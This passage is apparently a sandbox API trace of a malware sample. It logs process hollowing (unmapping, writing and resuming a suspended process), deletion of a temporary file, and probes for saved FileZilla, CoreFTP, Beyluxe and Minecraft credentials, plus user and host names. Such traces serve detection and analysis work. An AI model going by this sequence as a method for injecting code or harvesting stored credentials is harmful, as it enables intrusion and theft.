[504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0138.155] ReadProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x7ffde008, lpBuffer=0xf2ef10, nSize=0x4, lpNumberOfBytesRead=0xf2ef74 | out: lpBuffer=0xf2ef10*, lpNumberOfBytesRead=0xf2ef74*=0x4) returned 1 [0138.155] NtUnmapViewOfSection (ProcessHandle=0x3b4, BaseAddress=0x400000) returned 0x0 [0138.155] VirtualAllocEx (hProcess=0x3b4, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0138.156] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x400000, lpBuffer=0x6c41c10*, nSize=0x400, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x6c41c10*, lpNumberOfBytesWritten=0xf2ef74*=0x400) returned 1 [0138.156] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x401000, lpBuffer=0x33b8030*, nSize=0x11600, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x33b8030*, lpNumberOfBytesWritten=0xf2ef74*=0x11600) returned 1 [0138.158] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x413000, lpBuffer=0x33c963c*, nSize=0x3a00, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x33c963c*, lpNumberOfBytesWritten=0xf2ef74*=0x3a00) returned 1 [0138.158] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x417000, lpBuffer=0x33cd048*, nSize=0xc00, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x33cd048*, lpNumberOfBytesWritten=0xf2ef74*=0xc00) returned 1 [0138.159] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x419000, lpBuffer=0x33cdc54*, nSize=0x3000, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x33cdc54*, lpNumberOfBytesWritten=0xf2ef74*=0x3000) returned 1 [0138.159] WriteProcessMemory (in: hProcess=0x3b4, lpBaseAddress=0x7ffde008, lpBuffer=0x33d0c60*, nSize=0x4, lpNumberOfBytesWritten=0xf2ef74 | out: lpBuffer=0x33d0c60*, lpNumberOfBytesWritten=0xf2ef74*=0x4) returned 1 [0138.160] SetThreadContext (hThread=0x3b8, lpContext=0x33b7d58*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x41211a, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0138.160] ResumeThread (hThread=0x3b8) returned 0x1 [0138.160] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", lpFilePart=0x0) returned 0x34 [0138.160] GetLastError () returned 0x3f0 [0138.160] SetErrorMode (uMode=0x1) returned 0x0 [0138.160] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0138.161] GetLastError () returned 0x0 [0138.161] GetFileType (hFile=0x3d4) returned 0x1 [0138.161] SetErrorMode (uMode=0x0) returned 0x1 [0138.161] GetFileType (hFile=0x3d4) returned 0x1 [0138.161] ReadFile (in: hFile=0x3d4, lpBuffer=0x33d1b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33d1b40*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0138.161] GetLastError () returned 0x0 [0138.161] CloseHandle (hObject=0x3d4) returned 1 [0138.161] GetLastError () returned 0x0 [0139.171] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", lpFilePart=0x0) returned 0x34 [0139.171] GetLastError () returned 0x0 [0139.171] SetErrorMode (uMode=0x1) returned 0x0 [0139.171] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4 [0139.172] GetLastError () returned 0x0 [0139.172] GetFileType (hFile=0x3d4) returned 0x1 [0139.172] SetErrorMode (uMode=0x0) returned 0x1 [0139.172] GetFileType (hFile=0x3d4) returned 0x1 [0139.172] ReadFile (in: hFile=0x3d4, lpBuffer=0x33d3a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33d3a30*, lpNumberOfBytesRead=0xf2ef28*=0x1ce, lpOverlapped=0x0) returned 1 [0139.172] GetLastError () returned 0x0 [0139.172] ReadFile (in: hFile=0x3d4, lpBuffer=0x33d3a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33d3a30*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0139.172] GetLastError () returned 0x0 [0139.172] CloseHandle (hObject=0x3d4) returned 1 [0139.172] GetLastError () returned 0x0 [0139.172] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", nBufferLength=0x105, lpBuffer=0xf2eb10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", lpFilePart=0x0) returned 0x34 [0139.172] GetLastError () returned 0x0 [0139.172] SetErrorMode (uMode=0x1) returned 0x0 [0139.173] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp"), fInfoLevelId=0x0, lpFileInformation=0xf2ef90 | out: lpFileInformation=0xf2ef90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x139be600, ftCreationTime.dwHighDateTime=0x1d4653f, ftLastAccessTime.dwLowDateTime=0x139be600, ftLastAccessTime.dwHighDateTime=0x1d4653f, ftLastWriteTime.dwLowDateTime=0x13ecf41f, ftLastWriteTime.dwHighDateTime=0x1d4653f, nFileSizeHigh=0x0, nFileSizeLow=0x1ce)) returned 1 [0139.173] GetLastError () returned 0x0 [0139.173] SetErrorMode (uMode=0x0) returned 0x1 [0139.173] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", nBufferLength=0x105, lpBuffer=0xf2eb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp", lpFilePart=0x0) returned 0x34 [0139.173] GetLastError () returned 0x0 [0139.173] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp")) returned 1 [0139.174] GetLastError () returned 0x0 [0139.227] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0xf2ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0139.227] GetLastError () returned 0x3f0 [0139.227] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FileZilla", nBufferLength=0x105, lpBuffer=0xf2eb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FileZilla", lpFilePart=0x0) returned 0x2f [0139.227] GetLastError () returned 0x3f0 [0139.228] SetErrorMode (uMode=0x1) returned 0x0 [0139.228] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FileZilla" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\filezilla"), fInfoLevelId=0x0, lpFileInformation=0xf2efc0 | out: lpFileInformation=0xf2efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.228] GetLastError () returned 0x2 [0139.228] SetErrorMode (uMode=0x0) returned 0x1 [0139.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Beyluxe Messenger", ulOptions=0x0, samDesired=0x20019, phkResult=0xf2ee14 | out: phkResult=0xf2ee14*=0x0) returned 0x2 [0139.305] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0xf2e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0139.305] GetLastError () returned 0x3f0 [0139.305] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\CoreFTP\\sites.idx", nBufferLength=0x105, lpBuffer=0xf2ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\CoreFTP\\sites.idx", lpFilePart=0x0) returned 0x37 [0139.305] GetLastError () returned 0x3f0 [0139.306] SetErrorMode (uMode=0x1) returned 0x0 [0139.306] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\CoreFTP\\sites.idx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\coreftp\\sites.idx"), fInfoLevelId=0x0, lpFileInformation=0xf2eebc | out: lpFileInformation=0xf2eebc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.306] GetLastError () returned 0x3 [0139.306] SetErrorMode (uMode=0x0) returned 0x1 [0139.310] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0xf2eaac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0139.310] GetLastError () returned 0x3f0 [0139.311] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\.minecraft\\lastlogin", nBufferLength=0x105, lpBuffer=0xf2eb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\.minecraft\\lastlogin", lpFilePart=0x0) returned 0x3a [0139.311] GetLastError () returned 0x3f0 [0139.311] SetErrorMode (uMode=0x1) returned 0x0 [0139.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\.minecraft\\lastlogin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\.minecraft\\lastlogin"), fInfoLevelId=0x0, lpFileInformation=0xf2efac | out: lpFileInformation=0xf2efac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0139.316] GetLastError () returned 0x3 [0139.316] SetErrorMode (uMode=0x0) returned 0x1 [0139.394] GetUserNameW (in: lpBuffer=0x1271d60, pcbBuffer=0xf2efd8 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0xf2efd8) returned 1 [0139.396] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0xf2efd8 | out: lpBuffer="LHNIWSJ", nSize=0xf2efd8) returned 1 [0139.396] GetUserNameW (in: lpBuffer=0x1271d60, pcbBuffer=0xf2efd8 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0xf2efd8) returned 1 [0139.396] GetComputerNameW (in: lpBuffer=0x1271d60, nSize=0xf2efd8 | out: lpBuffer="LHNIWSJ", nSize=0xf2efd8) returned 1 [0139.441] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x454 [0139.442] GetLastError () returned 0x0 [0139.442] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x464 [0139.442] GetLastError () returned 0x0 [0139.575] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", nBufferLength=0x105, lpBuffer=0xf2e91c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", lpFilePart=0x0) returned 0x32 [0139.575] GetLastError () returned 0x0 [0139.575] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", nBufferLength=0x105, lpBuffer=0xf2e8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.config", lpFilePart=0x0) returned 0x32 [0139.575] GetLastError () returned 0x0 [0139.577] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", nBufferLength=0x105, lpBuffer=0xf2e8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe", lpFilePart=0x0) returned 0x2f [0139.577] GetLastError () returned 0x0 [0139.778] GetVersionExW (in: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1271d78*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0139.778] GetLastError () returned 0x0 [0139.784] GetCurrentProcess () returned 0xffffffff [0139.784] GetLastError () returned 0x3f0 [0139.785] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xf2ea68 | out: TokenHandle=0xf2ea68*=0x468) returned 1 [0139.785] GetLastError () returned 0x3f0 [0139.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0xf2e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0139.788] GetLastError () returned 0x0 [0139.789] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xf2eaa8 | out: lpFileInformation=0xf2eaa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6fa1b, ftCreationTime.dwHighDateTime=0x1d2d447, ftLastAccessTime.dwLowDateTime=0x128030a, ftLastAccessTime.dwHighDateTime=0x1d2d447, ftLastWriteTime.dwLowDateTime=0x969f9f4, ftLastWriteTime.dwHighDateTime=0x1d2d447, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0139.790] GetLastError () returned 0x0 [0139.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0139.791] GetLastError () returned 0x0 [0139.792] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0xf2eaa4 | out: lpFileInformation=0xf2eaa4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6fa1b, ftCreationTime.dwHighDateTime=0x1d2d447, ftLastAccessTime.dwLowDateTime=0x128030a, ftLastAccessTime.dwHighDateTime=0x1d2d447, ftLastWriteTime.dwLowDateTime=0x969f9f4, ftLastWriteTime.dwHighDateTime=0x1d2d447, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0139.792] GetLastError () returned 0x0 [0139.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xf2e50c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0139.792] GetLastError () returned 0x0 [0139.792] SetErrorMode (uMode=0x1) returned 0x0 [0139.792] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x470 [0139.792] GetLastError () returned 0x0 [0139.792] GetFileType (hFile=0x470) returned 0x1 [0139.793] SetErrorMode (uMode=0x0) returned 0x1 [0139.793] GetFileType (hFile=0x470) returned 0x1 [0139.801] GetFileSize (in: hFile=0x470, lpFileSizeHigh=0xf2ea78 | out: lpFileSizeHigh=0xf2ea78*=0x0) returned 0x65b3 [0139.801] GetLastError () returned 0x0 [0139.801] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ea30, lpOverlapped=0x0 | out: lpBuffer=0x31f0438*, lpNumberOfBytesRead=0xf2ea30*=0x1000, lpOverlapped=0x0) returned 1 [0139.802] GetLastError () returned 0x0 [0139.826] ReadFile (in: hFile=0x470, lpBuffer=0x31f0438, 